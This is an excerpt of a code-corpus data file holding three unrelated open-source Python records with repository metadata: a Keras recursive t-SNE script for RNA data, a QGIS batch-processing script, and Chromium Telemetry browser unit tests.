plt.savefig(\"/.../RNA/vector2_train_re2.png\")\r\n model.save('/.../RNA/model_vector_re2.h5')\r\n \r\n if epoch==449:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred7 = model.predict(X_train)\r\n plt.scatter(pred7[:, 0], pred7[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector1_train_re3.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred7 = model.predict(X_train)\r\n plt.scatter(pred7[:, 0], pred7[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_re3.png\")\r\n model.save('/.../RNA/model_vector_re3.h5')\r\n\r\npred = model.predict(X_train)\r\n\r\nplt.clf()\r\nfig = plt.figure(figsize=(5, 5)) \r\nplt.scatter(pred[:, 0], pred[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\nfig.tight_layout()\r\nplt.savefig(\"/.../RNA/vector1_train_f.png\")\r\nplt.clf()\r\nfig = plt.figure(figsize=(5, 5)) \r\nplt.scatter(pred[:, 0], pred[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\nfig.tight_layout()\r\nplt.savefig(\"/.../RNA/vector2_train_f.png\")\r\n##save model\r\nmodel.save(\"/.../RNA/model_vector.h5\") \r\n\r\n", "repo_name": "Eva0720/Deep-recursive-tSNE", "sub_path": "main_RNA.py", "file_name": "main_RNA.py", "file_ext": "py", "file_size_in_byte": 12424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.seterr", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 101, 
"usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 134, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 141, "usage_type": "name"}, {"api_name": "keras.backend.square", "line_number": 141, "usage_type": "call"}, {"api_name": "keras.backend.variable", "line_number": 142, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 142, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 143, "usage_type": "name"}, {"api_name": "keras.backend.dot", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.backend.pow", "line_number": 144, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 144, "usage_type": "name"}, {"api_name": "keras.backend.variable", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 146, "usage_type": "name"}, {"api_name": "keras.backend.maximum", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 147, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 148, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 149, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 150, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 150, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise_distances", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 176, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 176, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 178, "usage_type": "call"}, {"api_name": 
"numpy.inf", "line_number": 179, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 207, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 207, "usage_type": "name"}, {"api_name": "keras.backend.square", "line_number": 207, "usage_type": "call"}, {"api_name": "keras.backend.variable", "line_number": 208, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 208, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 209, "usage_type": "name"}, {"api_name": "keras.backend.dot", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 209, "usage_type": "call"}, {"api_name": "keras.backend.pow", "line_number": 210, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 210, "usage_type": "name"}, {"api_name": "keras.backend.variable", "line_number": 211, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 211, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 211, "usage_type": "call"}, {"api_name": "keras.backend.sum", "line_number": 212, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 212, "usage_type": "name"}, {"api_name": "keras.backend.maximum", "line_number": 213, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 213, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 214, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 215, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 215, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 227, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 235, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 238, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 239, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 240, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 241, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 242, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 243, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 244, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 245, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 246, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 247, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 248, "usage_type": "call"}, 
{"api_name": "keras.layers.BatchNormalization", "line_number": 249, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 250, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 251, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 253, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 254, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 255, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "keras.models.Model", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 295, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 353, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 374, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 374, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 389, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 393, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 393, "usage_type": "name"}]} +{"seq_id": "71191430246", "text": "\"\"\"GeoCogs QGIS plugin - Coefficient of Variation tool\nThis script will help run the tool as batch process for\ndifferent shape files and no. of years.\n\"\"\"\nfrom qgis import processing\nimport os\nfrom pathlib import Path\nimport time\n\n# folder path to multiple input shape files\nshp_directory = r'C:\\Users\\atree\\Desktop\\shp'\n\n# folder path to save the output CSV files\nout_directory = r'C:\\Users\\atree\\Desktop\\CSV'\n\n# input parameters - list of (start_year, end_year)\nyears = [\n (2019, 2019),\n (2020, 2020),\n (2021, 2021),\n]\nparameters = {\n 'START MONTH': 6,\n 'END MONTH': 9,\n 'PARAMETER': 0,\n 'COLNAME': 'DISTRICT' # unique field name\n}\n\n# don't modify beyond this line\nprint('started...')\nfor year in years:\n start_year, end_year = year\n out_path = Path.joinpath(Path(out_directory), f\"{str(start_year)}_{str(end_year)}\")\n out_path.mkdir(parents=True, exist_ok=True)\n for file in os.listdir(shp_directory):\n if os.path.splitext(file)[1] == '.shp':\n input_shp = os.path.join(shp_directory, file)\n # print(f'input file: {input_shp}')\n output_csv = os.path.join(\n out_path, f'{os.path.splitext(file)[0]}.csv')\n parameters['INPUT'] = input_shp\n parameters['OUTPUT'] = output_csv\n parameters['START YEAR'] = start_year\n parameters['END YEAR'] = end_year\n processing.run(\"geocogs:coeff_var\", parameters)\n print(f'{year} : {output_csv}')\n # time.sleep(300)\n\nprint('completed!!!')", "repo_name": "balakumaran247/geocogs", "sub_path": "batch_scripts/coeffofvariationbatch.py", "file_name": "coeffofvariationbatch.py", "file_ext": "py", "file_size_in_byte": 1527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path.joinpath", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "qgis.processing.run", "line_number": 45, "usage_type": "call"}, {"api_name": "qgis.processing", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "12508816105", "text": "import logging\nimport os\nimport re\nimport tempfile\nimport unittest\n\nfrom telemetry.core import exceptions\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser as browser_module\nfrom telemetry.internal.browser import browser_finder\nfrom telemetry.internal.platform 
import gpu_device\nfrom telemetry.internal.platform import gpu_info\nfrom telemetry.internal.platform import system_info\nfrom telemetry.testing import browser_test_case\nfrom telemetry.testing import options_for_unittests\nfrom telemetry.timeline import tracing_config\n\nfrom devil.android import app_ui\n\nimport mock\n\n\nclass IntentionalException(Exception):\n  pass\n\n\nclass BrowserTest(browser_test_case.BrowserTestCase):\n  def testBrowserCreation(self):\n    self.assertEquals(1, len(self._browser.tabs))\n\n    # Different browsers boot up to different things.\n    assert self._browser.tabs[0].url\n\n  @decorators.Enabled('has tabs')\n  def testNewCloseTab(self):\n    existing_tab = self._browser.tabs[0]\n    self.assertEquals(1, len(self._browser.tabs))\n    existing_tab_url = existing_tab.url\n\n    new_tab = self._browser.tabs.New()\n    self.assertEquals(2, len(self._browser.tabs))\n    self.assertEquals(existing_tab.url, existing_tab_url)\n    self.assertEquals(new_tab.url, 'about:blank')\n\n    new_tab.Close()\n    self.assertEquals(1, len(self._browser.tabs))\n    self.assertEquals(existing_tab.url, existing_tab_url)\n\n  def testMultipleTabCalls(self):\n    self._browser.tabs[0].Navigate(self.UrlOfUnittestFile('blank.html'))\n    self._browser.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()\n\n  def testTabCallByReference(self):\n    tab = self._browser.tabs[0]\n    tab.Navigate(self.UrlOfUnittestFile('blank.html'))\n    self._browser.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()\n\n  @decorators.Enabled('has tabs')\n  def testCloseReferencedTab(self):\n    self._browser.tabs.New()\n    tab = self._browser.tabs[0]\n    tab.Navigate(self.UrlOfUnittestFile('blank.html'))\n    tab.Close()\n    self.assertEquals(1, len(self._browser.tabs))\n\n  @decorators.Enabled('has tabs')\n  def testForegroundTab(self):\n    # Should be only one tab at this stage, so that must be the foreground tab\n    original_tab = self._browser.tabs[0]\n    self.assertEqual(self._browser.foreground_tab, original_tab)\n    new_tab = self._browser.tabs.New()\n    # New tab should be the foreground tab\n    self.assertEqual(self._browser.foreground_tab, new_tab)\n    # Make sure that activating the background tab makes it the foreground tab\n    original_tab.Activate()\n    self.assertEqual(self._browser.foreground_tab, original_tab)\n    # Closing the current foreground tab should switch the foreground tab to the\n    # other tab\n    original_tab.Close()\n    self.assertEqual(self._browser.foreground_tab, new_tab)\n\n  # This test uses the reference browser and doesn't have access to\n  # helper binaries like crashpad_database_util.\n  @decorators.Enabled('linux')\n  def testGetMinidumpPathOnCrash(self):\n    tab = self._browser.tabs[0]\n    with self.assertRaises(exceptions.AppCrashException):\n      tab.Navigate('chrome://crash', timeout=5)\n    crash_minidump_path = self._browser.GetMostRecentMinidumpPath()\n    self.assertIsNotNone(crash_minidump_path)\n\n  def testGetSystemInfo(self):\n    if not self._browser.supports_system_info:\n      logging.warning(\n          'Browser does not support getting system info, skipping test.')\n      return\n\n    info = self._browser.GetSystemInfo()\n\n    self.assertTrue(isinstance(info, system_info.SystemInfo))\n    self.assertTrue(hasattr(info, 'model_name'))\n    self.assertTrue(hasattr(info, 'gpu'))\n    self.assertTrue(isinstance(info.gpu, gpu_info.GPUInfo))\n    self.assertTrue(hasattr(info.gpu, 'devices'))\n    self.assertTrue(len(info.gpu.devices) > 0)\n    for g in info.gpu.devices:\n      self.assertTrue(isinstance(g, gpu_device.GPUDevice))\n\n  def testGetSystemInfoNotCachedObject(self):\n    if not 
self._browser.supports_system_info:\n logging.warning(\n 'Browser does not support getting system info, skipping test.')\n return\n\n info_a = self._browser.GetSystemInfo()\n info_b = self._browser.GetSystemInfo()\n self.assertFalse(info_a is info_b)\n\n def testSystemInfoModelNameOnMac(self):\n if self._browser.platform.GetOSName() != 'mac':\n self.skipTest('This test is only run on macOS')\n return\n\n if not self._browser.supports_system_info:\n logging.warning(\n 'Browser does not support getting system info, skipping test.')\n return\n\n info = self._browser.GetSystemInfo()\n model_name_re = r\"[a-zA-Z]* [0-9.]*\"\n self.assertNotEqual(re.match(model_name_re, info.model_name), None)\n\n # crbug.com/628836 (CrOS, where system-guest indicates ChromeOS guest)\n # github.com/catapult-project/catapult/issues/3130 (Windows)\n @decorators.Disabled('cros-chrome-guest', 'system-guest', 'chromeos', 'win')\n def testIsTracingRunning(self):\n tracing_controller = self._browser.platform.tracing_controller\n if not tracing_controller.IsChromeTracingSupported():\n return\n self.assertFalse(tracing_controller.is_tracing_running)\n config = tracing_config.TracingConfig()\n config.enable_chrome_trace = True\n tracing_controller.StartTracing(config)\n self.assertTrue(tracing_controller.is_tracing_running)\n tracing_controller.StopTracing()\n self.assertFalse(tracing_controller.is_tracing_running)\n\n @decorators.Enabled('android')\n def testGetAppUi(self):\n self.assertTrue(self._browser.supports_app_ui_interactions)\n ui = self._browser.GetAppUi()\n self.assertTrue(isinstance(ui, app_ui.AppUi))\n self.assertIsNotNone(ui.WaitForUiNode(resource_id='action_bar_root'))\n\n\nclass CommandLineBrowserTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.AppendExtraBrowserArgs('--user-agent=telemetry')\n\n def testCommandLineOverriding(self):\n # This test starts the browser with --user-agent=telemetry. 
This tests\n # whether the user agent is then set.\n t = self._browser.tabs[0]\n t.Navigate(self.UrlOfUnittestFile('blank.html'))\n t.WaitForDocumentReadyStateToBeInteractiveOrBetter()\n self.assertEquals(t.EvaluateJavaScript('navigator.userAgent'),\n 'telemetry')\n\nclass DirtyProfileBrowserTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.profile_type = 'small_profile'\n\n @decorators.Disabled('chromeos') # crbug.com/243912\n def testDirtyProfileCreation(self):\n self.assertEquals(1, len(self._browser.tabs))\n\n\nclass BrowserLoggingTest(browser_test_case.BrowserTestCase):\n @classmethod\n def CustomizeBrowserOptions(cls, options):\n options.logging_verbosity = options.VERBOSE_LOGGING\n\n @decorators.Disabled('chromeos', 'android')\n def testLogFileExist(self):\n self.assertTrue(\n os.path.isfile(self._browser._browser_backend.log_file_path))\n\n\nclass BrowserCreationTest(unittest.TestCase):\n def setUp(self):\n self.mock_browser_backend = mock.MagicMock()\n self.mock_platform_backend = mock.MagicMock()\n self.fake_startup_args = ['--foo', '--bar=2']\n\n def testCleanedUpCalledWhenExceptionRaisedInBrowserCreation(self):\n self.mock_browser_backend.SetBrowser.side_effect = (\n IntentionalException('Boom!'))\n with self.assertRaises(IntentionalException):\n browser_module.Browser(\n self.mock_browser_backend, self.mock_platform_backend,\n self.fake_startup_args)\n self.assertTrue(self.mock_browser_backend.Close.called)\n\n def testOriginalExceptionNotSwallow(self):\n self.mock_browser_backend.SetBrowser.side_effect = (\n IntentionalException('Boom!'))\n self.mock_platform_backend.WillCloseBrowser.side_effect = (\n IntentionalException('Cannot close browser!'))\n with self.assertRaises(IntentionalException) as context:\n browser_module.Browser(\n self.mock_browser_backend, self.mock_platform_backend,\n self.fake_startup_args)\n self.assertIn('Boom!', context.exception.message)\n\n\nclass TestBrowserCreation(unittest.TestCase):\n\n def setUp(self):\n self.finder_options = options_for_unittests.GetCopy()\n self.browser_to_create = browser_finder.FindBrowser(self.finder_options)\n self.browser_to_create.platform.network_controller.Open()\n\n @property\n def browser_options(self):\n return self.finder_options.browser_options\n\n def tearDown(self):\n self.browser_to_create.platform.network_controller.Close()\n\n def testCreateWithBrowserSession(self):\n with self.browser_to_create.BrowserSession(self.browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n\n def testCreateWithBadOptionsRaises(self):\n with self.assertRaises(AssertionError):\n # It's an error to pass finder_options instead of browser_options.\n with self.browser_to_create.BrowserSession(self.finder_options):\n pass # Do nothing.\n\n @decorators.Enabled('linux')\n # TODO(crbug.com/782691): enable this on Win\n # TODO(ashleymarie): Re-enable on mac (BUG=catapult:#3523)\n @decorators.Isolated\n def testBrowserNotLeakingTempFiles(self):\n before_browser_run_temp_dir_content = os.listdir(tempfile.tempdir)\n with self.browser_to_create.BrowserSession(self.browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n after_browser_run_temp_dir_content = os.listdir(tempfile.tempdir)\n self.assertEqual(before_browser_run_temp_dir_content,\n after_browser_run_temp_dir_content)\n\n def 
testSuccessfullyStartBrowserWithSystemCacheClearOptions(self):\n browser_options = self.browser_options\n browser_options.clear_sytem_cache_for_browser_and_profile_on_start = True\n with self.browser_to_create.BrowserSession(browser_options) as browser:\n tab = browser.tabs.New()\n tab.Navigate('about:blank')\n self.assertEquals(2, tab.EvaluateJavaScript('1 + 1'))\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/telemetry/telemetry/internal/browser/browser_unittest.py", "file_name": "browser_unittest.py", "file_ext": "py", "file_size_in_byte": 10061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 27, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 27, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 34, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 34, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 58, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 58, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 66, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 66, "usage_type": "name"}, {"api_name": "telemetry.core.exceptions.AppCrashException", "line_number": 87, "usage_type": "attribute"}, {"api_name": "telemetry.core.exceptions", "line_number": 87, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 84, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 84, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 94, "usage_type": "call"}, {"api_name": "telemetry.internal.platform.system_info.SystemInfo", "line_number": 100, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.system_info", "line_number": 100, "usage_type": "name"}, {"api_name": "telemetry.internal.platform.gpu_info.GPUInfo", "line_number": 103, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.gpu_info", "line_number": 103, "usage_type": "name"}, {"api_name": "telemetry.internal.platform.gpu_device.GPUDevice", "line_number": 107, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.gpu_device", "line_number": 107, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "re.match", "line_number": 131, "usage_type": "call"}, {"api_name": "telemetry.timeline.tracing_config.TracingConfig", 